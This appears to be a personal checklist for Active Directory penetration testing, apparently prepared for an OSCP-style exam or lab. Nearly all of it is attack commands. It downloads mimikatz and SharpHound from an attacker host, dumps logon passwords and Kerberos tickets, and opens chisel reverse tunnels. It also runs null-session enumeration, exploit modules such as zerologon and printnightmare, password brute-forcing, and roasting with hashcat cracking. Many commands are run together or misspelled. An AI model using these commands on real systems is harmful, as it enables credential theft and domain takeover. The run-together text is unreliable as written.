Checklist
ls C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\Do this for all users on the machine
Also run winPEAS to make sure no sensitive files are missed
.\chisel.exe client 192.168.45.x:8888 R:9999:socks
.\chisel.exe client 192.168.45.x:8888 8080:127.0.0.1:80curl 192.168.45.x/SharpHound.exe -o SharpHound.exe
.\SharpHound.exe -c allcurl 192.168.45.x/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit".\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"
dir *.kirbi
kerberos::ptt <ticket>enum4linux <IP>
enum4linux -u -p -a -A <IP>nmap -p 389 --script="ldap* and not brute" -Pn <IP> ldapsearch -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com" ldapsearch -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com" | grep -i descriptionnetexec smb <IP> -u '' -p '' --shares
netexec smb <IP> -u '' -p '' --users
netxec ldap <IP> -u '' -p '' --password-not-required --admin-count --users --groups
netexec smb <IP> -u '' -p '' --rid-brute
netexec smb <IP> -u '' -p '' -M spider_plus
netexec smb <IP> -u '' -p '' -M printnightmare
netexec smb <IP> -u '' -p '' -M gpp_password
netexec smb <IP> -u '' -p '' -M spooler
netexec smb <IP> -u '' -p '' -M nopac
netexec smb <IP> -u '' -p '' -M zerologonsmbmap -H <IP>
smbclient -L \\\\<IP>\\ -U '' -N rpcclient -U '' -N <IP>
rpcclient -U "username%passwd" <IP>
querydispinfo
queryuser joe
querygroup 0x44f
querygroupmem 0x44f kerbrute userenum -d pffsec.lab /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc dc.oscp.examkerbrute bruteuser -d offsec.lab ~/rockyou.txt w.smithimpacket-GetNPUsers -dc-ip <IP> -request oscp.exam/-format hashcat
impacket-GetNPUsers oscp.exam/user -dc-ip <IP> -format hashcat
hashcat -m 18200 crackme.txt ~/rockyou.txt -O -r ~/opt/wordlists/best64.rule -Oimpacket-GetUserSPNs oscp.exam/user:pass -dc-ip 192.168.1.129 -request
hashcat -m 13100 crackme.txt ~/rockyou.txt -O -r ~/opt/wordlists/best64.rule -Oimpacket-mssqlclient aerospace.com/discovery:'Start123!'@192.168.193.40
impacket-mssqlclient aerospace.com/discovery:'Start123!'@192.168.193.40 -windows-authbloodhound-python -d offsec.lab -u greg -p pass -ns 192.168.1.129 -c allLast updated